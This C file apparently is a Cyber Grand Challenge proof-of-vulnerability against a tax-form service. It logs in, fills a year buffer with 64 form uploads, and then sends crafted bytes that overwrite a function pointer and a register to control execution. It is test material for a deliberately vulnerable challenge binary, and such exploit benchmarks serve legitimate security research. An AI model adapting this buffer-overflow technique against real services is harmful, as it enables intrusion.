/*
 * Copyright (C) Narf Industries <info@narfindustries.com>
 *
 * Permission is hereby granted, free of charge, to any person obtaining a
 * copy of this software and associated documentation files (the "Software"),
 * to deal in the Software without restriction, including without limitation
 * the rights to use, copy, modify, merge, publish, distribute, sublicense,
 * and/or sell copies of the Software, and to permit persons to whom the
 * Software is furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included
 * in all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
 * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
 * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
 * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
 * CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
 * TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
 * SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#include <libpov.h>

int main(void) {
   type1_vals t1vals = { 0 };
   uint32_t mask_eip, mask_reg;

   mask_eip = 0x0DFFFEFF;
   mask_reg = 0xEFFFF7FF;

   type1_negotiate(mask_eip, mask_reg, 2, &t1vals);

   t1vals.ipval |= 0xF0000000;   // make sure out of range of valid fn ptrs
   // t1vals.regval |= 0xF0000000;  // make sure out of range of valid fn ptrs

   t1vals.ipval |= 0x02000100;   // make sure will result in unique tax_years
   t1vals.regval |= 0x10000800;  // make sure will result in unique tax_years


   char *p_ipval  = (char *)&t1vals.ipval;
   char *p_regval = (char *)&t1vals.regval;


   /**
   # Fill year_buf with 64 years
   # after that the next 2 overwrite fn ptr (EIP)
   # 4 more to fill in space
   # then last 2 will overwite *r (EDX)

   session buf2 -> cmd[8], bytes[2], data[N]

   tax_yr is data[0], data[1] -> buf bytes 10 and 11

   for 0x0FFF
   buf[10] = p_ipval[0];
   buf[11] = p_ipval[1];

   for 0x1FFF
   buf[10] = p_ipval[2];
   buf[11] = p_ipval[3];

   for 0xFBBF
   buf[10] = p_regval[0];
   buf[11] = p_regval[1];

   for 0xFBB0
   buf[10] = p_regval[2];
   buf[11] = p_regval[3];
   **/

   unsigned int  read_buf_len = 148;
   unsigned char *read_buf = (unsigned char*)malloc(read_buf_len);

   unsigned int pwd_len = 12;
   unsigned char *pwd = (unsigned char*)malloc(pwd_len);

   // Create Account
   static unsigned char write_00000[] = 
      "\x58\x42\x42\x77\x48\x46\x63\x5a\x47\x6d\x7a\x78\x62\x71\x43\x7a"
      "\x73\x55\x78\x68\x61\x59\x41\x6e\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\xa0\xa1\xa2\xa3\xa0\xa1\xa2\xa3\x88\x02\x6f\x52"
      "\x47\x4c\x5a\x65\x46\x42\x57\x72\x4c\x62\x58\x71\x77\x63\x67\x4b"
      "\x68\x58\x43\x7a\x47\x52\x4c\x68\x4c\x77\x74\x56\x49\x42\x48\x63"
      "\x54\x63\x7a\x6e\x51\x6f\x75\x78\x5a\x71\x72\x54\x7a\x74\x6c\x4f"
      "\x72\x65\x72\x50\x6c\x6a\x4c\x50\x66\x71\x74\x56\x67\x57\x6e\x69"
      "\x47\x48\x63\x44\x47\x41\x68\x48\x67\x48\x53\x57\x72\x46\x41\x6e"
      "\x48\x4a\x47\x6c\x56\x45\x4b\x77\x68\x4f\x53\x6f\x67\x57\x50\x4d"
      "\x7a\x53\x6e\x55\x79\x49\x43\x41\x48\x42\x76\x71\x54\x46\x62\x6d"
      "\x55\x78\x71\x6b\x5a\x58\x43\x44\x4c\x66\x55\x4f\x68\x75\x6a\x45"
      "\x56\x47\x70\x45\x47\x4d\x65\x74\x50\x70\x66\x72\x79\x4b\x61\x41"
      "\x43\x7a\x55\x71\x52\x54\x63\x57\x6f\x47\x75\x54\x45\x6d\x55\x49"
      "\x77\x42\x43\x75\x5a\x4c\x6b\x78\x62\x4a\x4e\x68\x47\x54\x62\x6a"
      "\x73\x79\x65\x79\x78\x7a\x61\x74\x75\x73\x4c\x6c\x41\x75\x74\x7a"
      "\x57\x4d\x5a\x51\x66\x6b\x46\x4e\x74\x6a\x43\x4d\x78\x68\x71\x4b"
      "\x62\x52\x4e\x49\x59\x70\x71\x77\x74\x75\x76\x6a\x6f\x70\x78\x58"
      "\x62\x69\x62\x73\x4d\x70\x49\x77\x67\x67\x55\x48\x50\x79\x57\x63"
      "\x6f\x7a\x66\x56\x66\x6a\x64\x42\x54\x4b\x4c\x62\x76\x70\x69\x48"
      "\x4a\x58\x44\x47\x4c\x75\x6d\x74\x65\x47\x48\x7a\x66\x5a\x4d\x49"
      "\x68\x62\x73\x65\x73\x66\x6d\x79\x6f\x57\x71\x52\x76\x66\x62\x79"
      "\x71\x7a\x46\x66\x79\x68\x61\x59\x49\x50\x66\x42\x4b\x6a\x46\x64"
      "\x53\x57\x67\x78\x77\x75\x77\x61\x4e\x63\x70\x76\x41\x56\x64\x4b"
      "\x53\x55\x55\x71\x69\x78\x72\x6f\x52\x4d\x4d\x77\x75\x72\x4a\x64"
      "\x46\x72\x49\x4d\x6b\x64\x4e\x62\x51\x72\x59\x79\x57\x57\x78\x53"
      "\x6b\x5a\x55\x4a\x71\x48\x4d\x66\x72\x79\x51\x4b\x5a\x4c\x72\x78"
      "\x64\x6f\x59\x78\x6b\x54\x4a\x42\x68\x49\x72\x46\x45\x55\x4d\x4a"
      "\x48\x64\x6c\x69\x6f\x41\x66\x75\x75\x52\x51\x59\x6d\x76\x74\x69"
      "\x46\x63\x45\x4b\x73\x49\x42\x6d\x6f\x47\x59\x4a\x48\x76\x64\x73"
      "\x4a\x51\x4d\x53\x51\x76\x51\x53\x59\x47\x41\x4f\x41\x73\x7a\x51"
      "\x65\x77\x77\x63\x6d\x65\x61\x6a\x65\x6a\x70\x43\x4a\x4c\x75\x62"
      "\x57\x52\x50\x55\x71\x4d\x6e\x4f\x42\x43\x52\x41\x59\x46\x65\x70"
      "\x50\x47\x5a\x78\x4f\x74\x75\x56\x63\x79\x7a\x66\x62\x6b\x4c\x72"
      "\x55\x62\x50\x41\x4a\x6e\x53\x70\x7a\x50\x78\x6b\x79\x76\x55\x4c"
      "\x50\x71\x6b\x4e\x49\x62\x74\x6b\x51\x6c\x67\x44\x49\x68\x79\x74"
      "\x4c\x46\x75\x72\x64\x56\x7a\x44\x78\x77\x54\x7a\x6a\x69\x46\x73"
      "\x5a\x6d\x78\x6d\x64\x4e\x51\x44\x73\x4b\x6f\x76\x78\x54\x74\x78"
      "\x73\x44\x51\x48\x74\x61\x59\x69\x48\x64\x5a\x6d\x6f\x43\x56\x61"
      "\x77\x61\x65\x64\x73\x78\x6c\x50\x59\x53\x55\x79\x53\x58\x49\x4c"
      "\x4f\x64\x77\x56\x61\x7a\x75\x5a\x75\x6b\x65\x65\x59\x47\x49\x61"
      "\x6d\x45\x6e\x7a\x73\x78\x4c\x78\x43\x56\x44\x41\x74\x64\x68\x4b"
      "\x78\x71\x42\x78\x41\x41\x59\x64\x75\x46\x46\x4c\x6e\x44\x63\x4b"
      "\x55\x75\x4b\x4a\x66\x61\x6c\x4c\x64\x56\x77\x55\x44\x67\x2c\x2e"
      "\x2e\x00\x38\x25\x18\x00";
   static unsigned int write_00000_len = 694;
   transmit_all(1, write_00000, write_00000_len);

   // read s_key
   length_read(0, read_buf, 12);

   // read pwd 
   length_read(0, pwd, pwd_len);

   // read the rest
   length_read(0, read_buf, 8+128-12);


   // Login
   // send buf1
   static unsigned char write_login_buf1[] = 
         "\x43\x4e\x51\x6c\x48\x67\x44\x41\x52\x51\x59\x51\x62\x71\x43\x7a"
         "\x73\x55\x78\x68\x61\x59\x41\x6e";
   static unsigned int write_login_buf1_len = 24;
   transmit_all(1, write_login_buf1, write_login_buf1_len);

   // send pwd
   transmit_all(1, pwd, pwd_len);

   // send buf2
   static unsigned char write_login_buf2[] = 
         "\xbc\xbc\xbc\xbc\xbc\xbc\xbc\xbc\x00\x00";
   static unsigned int write_login_buf2_len = 10;
   transmit_all(1, write_login_buf2, write_login_buf2_len);

   length_read(0, read_buf, read_buf_len);


   // Upload Forms
   // Start loop of 64 to fill buffer

   static unsigned char write_buf1[] = 
         "\x43\x4e\x51\x6c\x48\x67\x44\x41\x52\x51\x59\x51\x62\x71\x43\x7a"
         "\x73\x55\x78\x68\x61\x59\x41\x6e";
   static unsigned int write_buf1_len = 24;

   static unsigned char write_buf2[] = 
      "\xf0\xf1\xf2\xf3\xf0\xf1\xf2\xf3\xeb\x02\x15\x84\x6f\x52\x47\x4c"
      "\x5a\x65\x46\x42\x57\x72\x4c\x62\x58\x71\x77\x63\x67\x4b\x68\x58"
      "\x43\x7a\x47\x52\x4c\x68\x4c\x77\x74\x56\x49\x42\x48\x63\x54\x63"
      "\x7a\x6e\x51\x6f\x75\x78\x5a\x71\x72\x54\x7a\x74\x6c\x4f\x72\x65"
      "\x72\x50\x6c\x6a\x4c\x50\x66\x71\x74\x56\x67\x57\x6e\x69\x47\x48"
      "\x63\x44\x47\x41\x68\x48\x67\x48\x53\x57\x72\x46\x41\x6e\x48\x4a"
      "\x47\x6c\x56\x45\x4b\x77\x68\x4f\x53\x6f\x67\x57\x50\x4d\x7a\x53"
      "\x6e\x55\x79\x49\x43\x41\x48\x42\x76\x71\x54\x46\x62\x6d\x55\x78"
      "\x71\x6b\x5a\x58\x43\x44\x4c\x66\x55\x4f\x68\x75\x6a\x45\x56\x47"
      "\x70\x45\x47\x4d\x65\x74\x50\x70\x66\x72\x79\x4b\x61\x41\x43\x7a"
      "\x55\x71\x52\x54\x63\x57\x6f\x47\x75\x54\x45\x6d\x55\x49\x77\x42"
      "\x43\x75\x5a\x4c\x6b\x78\x62\x4a\x4e\x68\x47\x54\x62\x6a\x73\x79"
      "\x65\x79\x78\x7a\x61\x74\x75\x73\x4c\x6c\x41\x75\x74\x7a\x57\x4d"
      "\x5a\x51\x66\x6b\x46\x4e\x74\x6a\x43\x4d\x78\x68\x71\x4b\x62\x52"
      "\x4e\x49\x59\x70\x71\x77\x74\x75\x76\x6a\x6f\x70\x78\x58\x62\x69"
      "\x62\x73\x4d\x70\x49\x77\x67\x67\x55\x48\x50\x79\x57\x63\x6f\x7a"
      "\x66\x56\x66\x6a\x64\x42\x54\x4b\x4c\x62\x76\x70\x69\x48\x4a\x58"
      "\x44\x47\x4c\x75\x6d\x74\x65\x47\x48\x7a\x66\x5a\x4d\x49\x68\x62"
      "\x73\x65\x73\x66\x6d\x79\x6f\x57\x71\x52\x76\x66\x62\x79\x71\x7a"
      "\x46\x66\x79\x68\x61\x59\x49\x50\x66\x42\x4b\x6a\x46\x64\x53\x57"
      "\x67\x78\x77\x75\x77\x61\x4e\x63\x70\x76\x41\x56\x64\x4b\x53\x55"
      "\x55\x71\x69\x78\x72\x6f\x52\x4d\x4d\x77\x75\x72\x4a\x64\x46\x72"
      "\x49\x4d\x6b\x64\x4e\x62\x51\x72\x59\x79\x57\x57\x78\x53\x6b\x5a"
      "\x55\x4a\x71\x48\x4d\x66\x72\x79\x51\x4b\x5a\x4c\x72\x78\x64\x6f"
      "\x59\x78\x6b\x54\x4a\x42\x68\x49\x72\x46\x45\x55\x4d\x4a\x48\x64"
      "\x6c\x69\x6f\x41\x66\x75\x75\x52\x51\x59\x6d\x76\x74\x69\x46\x63"
      "\x45\x4b\x73\x49\x42\x6d\x6f\x47\x59\x4a\x48\x76\x64\x73\x4a\x51"
      "\x4d\x53\x51\x76\x51\x53\x59\x47\x41\x4f\x41\x73\x7a\x51\x65\x77"
      "\x77\x63\x6d\x65\x61\x6a\x65\x6a\x70\x43\x4a\x4c\x75\x62\x57\x52"
      "\x50\x55\x71\x4d\x6e\x4f\x42\x43\x52\x41\x59\x46\x65\x70\x50\x47"
      "\x5a\x78\x4f\x74\x75\x56\x63\x79\x7a\x66\x62\x6b\x4c\x72\x55\x62"
      "\x50\x41\x4a\x6e\x53\x70\x7a\x50\x78\x6b\x79\x76\x55\x4c\x50\x71"
      "\x6b\x4e\x49\x62\x74\x6b\x51\x6c\x67\x44\x49\x68\x79\x74\x4c\x46"
      "\x75\x72\x64\x56\x7a\x44\x78\x77\x54\x7a\x6a\x69\x46\x73\x5a\x6d"
      "\x78\x6d\x64\x4e\x51\x44\x73\x4b\x6f\x76\x78\x54\x74\x78\x73\x44"
      "\x51\x48\x74\x61\x59\x69\x48\x64\x5a\x6d\x6f\x43\x56\x61\x77\x61"
      "\x65\x64\x73\x78\x6c\x50\x59\x53\x55\x79\x53\x58\x49\x4c\x4f\x64"
      "\x77\x56\x61\x7a\x75\x5a\x75\x6b\x65\x65\x59\x47\x49\x61\x6d\x45"
      "\x6e\x7a\x73\x78\x4c\x78\x43\x56\x44\x41\x74\x64\x68\x4b\x78\x71"
      "\x42\x78\x41\x41\x59\x64\x75\x46\x46\x4c\x6e\x44\x63\x4b\x55\x75"
      "\x4b\x4a\x66\x61\x6c\x4c\x64\x56\x77\x55\x44\x67\x38\x25\x18\x00"
      "\x59\xe2\x01\x00\x00\x04\x00\x00\x00\x8a\xff\x03\x00\xce\x84\x00"
      "\x00\x01\x57\x0e\x00\x0f\x50\x00\x00\x98\xac\x00\x00\x13\x53\x0a"
      "\x00\xa3\xad\x00\x00\x4d\x19\x00\x00\x81\x02\x00\x00\x31\x08\x00"
      "\x00\x46\x00\x00\x00\xa8\x12\x01\x00\x2b\x0b\x00\x00\x57\x4f\x50"
      "\x4a\x43\x1a\x15\x0e\x4e\xad\x0b\x00\x45\x24\x00\x00\xd3\x1d\x01"
      "\x00\x4c\x70\x47\x6f\x34\x31\x34\x31\x34\x30\x31\x37\xd0\xb5\x00"
      "\x00\x00\x00\x00\x00";
   static unsigned int write_buf2_len = 757;

   // keep track of tax_yr counter bytes to ensure we don't get duplicate tax years
   unsigned char tax_yr_byte10 = write_buf2[10];
   unsigned char tax_yr_byte11 = write_buf2[11];

   // upload form loop to fill buffer
   for (int i = 0; i < 64; i++) {
      transmit_all(1, write_buf1, write_buf1_len);
      transmit_all(1, pwd, pwd_len);
      write_buf2[10] = tax_yr_byte10++;
      // write_buf2[10] = tax_yr_byte;
      transmit_all(1, write_buf2, write_buf2_len);
      length_read(0, read_buf, read_buf_len);
   }

   // upload form, tax year 0x0FFF buf1
   transmit_all(1, write_buf1, write_buf1_len);
   transmit_all(1, pwd, pwd_len);
   // for 0x0FFF
   write_buf2[10] = p_ipval[0];
   write_buf2[11] = p_ipval[1];

   transmit_all(1, write_buf2, write_buf2_len);
   length_read(0, read_buf, read_buf_len);

   // upload form, tax year 0x1FFF buf1
   transmit_all(1, write_buf1, write_buf1_len);
   transmit_all(1, pwd, pwd_len);
   // for 0x1FFF
   write_buf2[10] = p_ipval[2];
   write_buf2[11] = p_ipval[3];

   transmit_all(1, write_buf2, write_buf2_len);
   length_read(0, read_buf, read_buf_len);

   // upload form loop for 4 more extras
   for (int i = 0; i < 4; i++) {
      transmit_all(1, write_buf1, write_buf1_len);
      transmit_all(1, pwd, pwd_len);
      // set tax_yr_byte in write_buf2
      write_buf2[10] = tax_yr_byte10++;
      write_buf2[11] = tax_yr_byte11;
      transmit_all(1, write_buf2, write_buf2_len);
      length_read(0, read_buf, read_buf_len);
   }

   // upload form, tax year 0xFBBF buf1
   transmit_all(1, write_buf1, write_buf1_len);
   transmit_all(1, pwd, pwd_len);
   // for 0xFBBF
   write_buf2[10] = p_regval[0];
   write_buf2[11] = p_regval[1];

   transmit_all(1, write_buf2, write_buf2_len);
   length_read(0, read_buf, read_buf_len);

   // upload form, tax year 0xFBBO buf1
   transmit_all(1, write_buf1, write_buf1_len);
   transmit_all(1, pwd, pwd_len);
   // for 0xFBB0
   write_buf2[10] = p_regval[2];
   write_buf2[11] = p_regval[3];

   transmit_all(1, write_buf2, write_buf2_len);
   length_read(0, read_buf, read_buf_len);


   // tax submitted buf1
   transmit_all(1, write_buf1, write_buf1_len);
   // tax submitted pwd
   transmit_all(1, pwd, pwd_len);

    // tax submitted buf2
   static unsigned char write_00222[] = 
         "\x50\x11\x50\x11\x50\x11\x50\x11\x04\x00\x00\x00\xff\xff";
   static unsigned int write_00222_len = 14;
   transmit_all(1, write_00222, write_00222_len);

   // should segfault here...

   // tax submitted read
   length_read(0, read_buf, read_buf_len);
   
}
